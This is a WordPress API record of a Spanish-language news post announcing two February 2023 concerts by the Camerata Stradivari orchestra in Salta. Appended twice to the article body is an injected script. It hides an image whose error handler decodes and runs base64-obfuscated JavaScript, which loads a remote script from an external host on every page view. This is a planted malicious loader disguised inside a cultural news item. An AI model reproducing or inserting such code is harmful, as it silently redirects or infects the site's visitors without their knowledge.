{"id":2186,"date":"2023-02-07T12:22:49","date_gmt":"2023-02-07T15:22:49","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2186"},"modified":"2025-08-14T00:23:47","modified_gmt":"2025-08-14T03:23:47","slug":"la-camerata-stradivari-inicia-su-temporada-de-conciertos-2023","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2186","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-camerata-stradivari-inicia-su-temporada-de-conciertos-2023-87703\">La Camerata Stradivari inicia su temporada de conciertos 2023<\/a>"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#6a4f06\"><em>Con una selecci\u00f3n de lo mejor del 2022, la agrupaci\u00f3n orquestal presentar\u00e1 su primer concierto del a\u00f1o en dos funciones. Las mismas tendr\u00e1n lugar este jueves 9 y el viernes 10 de febrero a las 21 en Sociedad Italiana, Zuvir\u00eda 380.<\/em><\/h4>\n\n\n\n<p>El cuerpo art\u00edstico dirigido por la Maestra Inga Iordanishvilli retoma sus actividades con una doble funci\u00f3n este jueves 9 y viernes 10 de febrero a las 21 en Sociedad Italiana, Zuvir\u00eda 380.<\/p>\n\n\n\n<p>En esta oportunidad el programa estar\u00e1 integrado por un repertorio de obras de diversos g\u00e9neros; se podr\u00e1n escuchar canciones de rock nacional e internacional, hasta m\u00fasica de pel\u00edculas y de producciones de series cinematogr\u00e1ficas: Ser\u00e1 una excelente oportunidad para disfrutar de una selecci\u00f3n de lo interpretado en el 2022.<\/p>\n\n\n\n<p>Resonar\u00e1n temas de la serie \u201cGame of Thrones\u201d y de la saga \u201cLord of the Rings\u201d; y de grandes exponentes del rock nacional como Luis Alberto Spinetta y Gustavo Cerati, y de las bandas Soda Stereo y Los Fabulosos Cadillacs.<\/p>\n\n\n\n<p>El rock internacional tendr\u00e1 su momento con la interpretaci\u00f3n de canciones de Led Zeppelin, Deep Purple, Ozzy Osbourne y Guns n\u2019 Roses; y para los amantes de The Beatles: Yesterday, y Hard Days&#8217; Night.<\/p>\n\n\n\n<p>Las entradas para este Jueves 9 y viernes 10 de febrero ya se encuentran a la venta. &nbsp;Pod\u00e9s adquirirlas al 3875421754 o al 3874138990. Tambi\u00e9n podes adquirirlas en la Sociedad Italiana, recordamos que las localidades son sin ubicaci\u00f3n y por orden de llegada.<\/p>\n\n\n\n<p>Fundaci\u00f3n Camerata Stradivari, bajo la direcci\u00f3n de la Maestra Inga Iordanishvili, es un proyecto inclusivo e integrador que brinda formaci\u00f3n y perfeccionamiento en diversos instrumentos a trav\u00e9s de su Orquesta Sinf\u00f3nica, su Orquesta de c\u00e1mara y Coro.<\/p>\n\n\n\n<p>Esta informaci\u00f3n fue brindada por gentileza de Fundaci\u00f3n Camerata Stradivari. Para comunicar eventos culturales de inter\u00e9s p\u00fablico pod\u00e9s hacerlo poni\u00e9ndote en contacto a trav\u00e9s de culturaconvos@gmail.com con el equipo de prensa y comunicaci\u00f3n de la secretar\u00eda de Cultura de la Provincia.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-camerata-stradivari-inicia-su-temporada-de-conciertos-2023-87703\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n\n\n\n<p><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con una selecci\u00f3n de lo mejor del 2022, la agrupaci\u00f3n orquestal presentar\u00e1 su primer concierto del a\u00f1o en dos funciones. Las mismas tendr\u00e1n lugar este jueves 9 y el viernes 10 de febrero a las 21 en Sociedad Italiana, Zuvir\u00eda 380. El cuerpo art\u00edstico dirigido por la Maestra Inga Iordanishvilli retoma sus actividades con una [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2187,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2186","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2186"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2186"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2186\/revisions"}],"predecessor-version":[{"id":7183,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2186\/revisions\/7183"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2187"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2186"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2186"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2186"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}